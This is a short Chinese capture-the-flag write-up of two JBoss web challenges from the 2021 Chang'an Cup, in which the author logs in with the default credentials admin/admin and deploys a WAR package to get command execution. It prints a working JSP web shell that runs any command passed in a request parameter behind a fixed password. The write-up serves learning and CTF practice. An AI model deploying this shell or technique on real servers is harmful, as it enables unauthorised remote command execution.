2021长安杯WEB题部分WP
作者:互联网
2021长安杯WEB题部分WP
1.前言
怎么说呢,这次的长安杯比赛的题目有些奇怪。当然这里指我怎么也看不懂的WEB第一题《soeasy》,还有我做的这两道JBOSS的题目。当我做出第一道JBOSS之后,我发现他只是一道很简单的RCE,但是不久平台又放出了第二道JBOSS题目。额。。。怎么说呢?虽然他的题目描述上有JBOSS很不甘心的字眼,但这两道题明明是同一个解题方式呀。
2.正文
题目的话就是上面的这两道,题目在这里就一起说了,因为解法都是一样的(X。
首先拿到题目,一个JBOSS的管理界面。
然后进入管理员控制台登陆界面。
这里的话就是一个弱口令,admin,admin没有什么好说的。直接就进到了后台管理界面。
在后台的管理界面看到了上传WAR包的地方,那么很明显这道题考察的就是Jboss 5.x/6.x admin-Console后台部署war包相关的知识。
那么先拿一个脚本生成WAR包。下面这个脚本来源于这位大佬
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
生成war包
然后上传
然后利用传参进行RCE
cat一下flag,拿到flag
3.后记
在文章的刚开始就说过了,两道题都可以通过同一个方式拿到flag,虽然不知道为什么,很有可能是出题方的失误。
标签:WEB,题目,admin,JBOSS,flag,2021,WP,out 来源: https://blog.csdn.net/Mrs_H/article/details/120488570